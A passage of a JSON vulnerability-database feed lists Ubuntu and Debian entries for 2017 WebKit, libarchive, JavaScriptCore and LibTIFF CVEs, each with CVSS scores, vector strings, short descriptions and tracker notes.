(memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2470", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2470"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2470", "href": "https://ubuntu.com/security/CVE-2017-2470", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:10", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected.\nwatchOS before 3.2 is affected. The issue involves symlink mishandling in\nthe \"libarchive\" component. 
It allows local users to change arbitrary\ndirectory permissions via unspecified vectors.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | possibly apple-specific, no details marking as not-affected due to lack of details as of 2018-03-27\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-04-02T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2390", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2390"], "modified": "2017-04-02T00:00:00", "id": "UB:CVE-2017-2390", "href": "https://ubuntu.com/security/CVE-2017-2390", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:03:15", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to bypass\nthe Same Origin Policy and obtain sensitive information via a crafted web\nsite.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2386", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2386"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2386", "href": "https://ubuntu.com/security/CVE-2017-2386", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:03:12", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2469", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2469"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2469", "href": "https://ubuntu.com/security/CVE-2017-2469", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:14", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2459", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2459"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2459", "href": "https://ubuntu.com/security/CVE-2017-2459", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:14", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nconduct Universal XSS (UXSS) attacks via crafted frame objects.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2445", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2445"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2445", "href": "https://ubuntu.com/security/CVE-2017-2445", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:03:13", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2465", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2465"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2465", "href": "https://ubuntu.com/security/CVE-2017-2465", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:14", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2455", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2455"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2455", "href": "https://ubuntu.com/security/CVE-2017-2455", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:12", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2464", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2464"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2464", "href": "https://ubuntu.com/security/CVE-2017-2464", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2021-12-14T17:53:45", "description": "JavaScriptCore in WebKit allows attackers to cause a denial of service (out-of-bounds heap read) via a crafted Javascript file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": 
"2017-02-03T15:59:00", "type": "debiancve", "title": "CVE-2016-9642", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9642"], "modified": "2017-02-03T15:59:00", "id": "DEBIANCVE:CVE-2016-9642", "href": "https://security-tracker.debian.org/tracker/CVE-2016-9642", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-12-14T17:53:45", "description": "The regex code in Webkit 2.4.11 allows remote attackers to cause a denial of service (memory consumption) as demonstrated in a large number of ($ (open parenthesis and dollar) followed by {-2,16} and a large number of +) (plus close parenthesis).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-03-07T16:59:00", "type": "debiancve", "title": "CVE-2016-9643", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9643"], "modified": "2017-03-07T16:59:00", "id": "DEBIANCVE:CVE-2016-9643", "href": "https://security-tracker.debian.org/tracker/CVE-2016-9643", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-10T16:34:37", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2396", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2396"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2396", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2396", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2022-08-10T16:34:37", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2395", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2395"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2395", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2395", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2476", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2476"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2476", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2476", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2468", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2468"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2468", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2468", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-09T06:03:36", "description": "The DumpModeEncode function in tif_dumpmode.c in the bmp2tiff tool in LibTIFF 4.0.6 and earlier, when the \"-c none\" option is used, allows remote attackers to cause a denial of service (buffer over-read) via a crafted BMP image.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-10-03T16:09:00", "type": "debiancve", "title": "CVE-2016-3619", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619"], "modified": "2016-10-03T16:09:00", "id": "DEBIANCVE:CVE-2016-3619", "href": "https://security-tracker.debian.org/tracker/CVE-2016-3619", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to conduct Universal XSS (UXSS) attacks via crafted use of frames on a web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2475", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2475"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2475", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2475", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": 